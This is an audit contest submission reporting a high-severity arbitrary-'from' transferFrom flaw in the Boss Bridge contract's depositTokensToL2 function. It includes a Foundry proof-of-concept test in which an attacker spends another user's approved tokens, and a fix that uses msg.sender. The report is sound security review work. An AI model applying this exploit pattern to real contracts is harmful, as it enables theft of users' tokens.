First Flight #4: Boss Bridge

First Flight #4

Beginner FriendlyFoundryBridge

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Arbitrary 'from' in 'transferFrom' – Unauthorized Access

0xtheblackpanther

Summary

In depositTokensToL2 function's use of "transferFrom" with an arbitrary "from" address, potentially granting unauthorized access. It allows an attacker, to exploit user's approval for the contract to spend his tokens. Attacker can call the function and specify user's address as the "from" parameter in "transferFrom", enabling him to transfer user's tokens.

Vulnerability Details

In the smart contract, an attacker can manipulate the "from" address in the depositTokensToL2 function, leading to unauthorized access and the potential transfer of another user's tokens, undermining the security and integrity of the contract's token handling.

Impact

The vulnerability exposes a critical risk of unauthorized token transfers, potentially leading to loss of user funds and a breach of trust in the affected smart contract.

POC

Copy the below test function and paste it in L1BossBridgeTest.t.sol
now run forge test --match-test testManipulatedFromAddressCanDeposit -vvvv in terminal
you will get this result Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 16.16ms

function testManipulatedFromAddressCanDeposit() public {

address attacker = makeAddr("attacker");

vm.startPrank(user);

uint256 amount = 10e18;

token.approve(address(tokenBridge), amount);

vm.stopPrank();

vm.expectEmit(address(tokenBridge));

// Attacker is calling the deposit and using user addy as from

vm.startPrank(attacker);

emit Deposit(user, userInL2, amount);

tokenBridge.depositTokensToL2(user, userInL2, amount);

assertEq(token.balanceOf(address(tokenBridge)), 0);

assertEq(token.balanceOf(address(vault)), amount);

vm.stopPrank();

}

Tools Used

Foundry and manual review

Recommendations

Use msg.sender as from in transferFrom.

replace depositTokensToL2 function with below code:

+function depositTokensToL2(address l2Recipient, uint256 amount) external whenNotPaused {

+ if (token.balanceOf(address(vault)) + amount > DEPOSIT_LIMIT) {

+ revert L1BossBridge__DepositLimitReached();

+ }

+ // Use msg.sender as the sender address

+ token.safeTransferFrom(msg.sender, address(vault), amount);

+ // Our off-chain service picks up this event and mints the corresponding tokens on L2

+ emit Deposit(msg.sender, l2Recipient, amount);

}

Updates

Lead Judging Commences

0xnevi Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

depositTokensToL2(): abitrary from address

Rewards breakdown

nSLOC

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.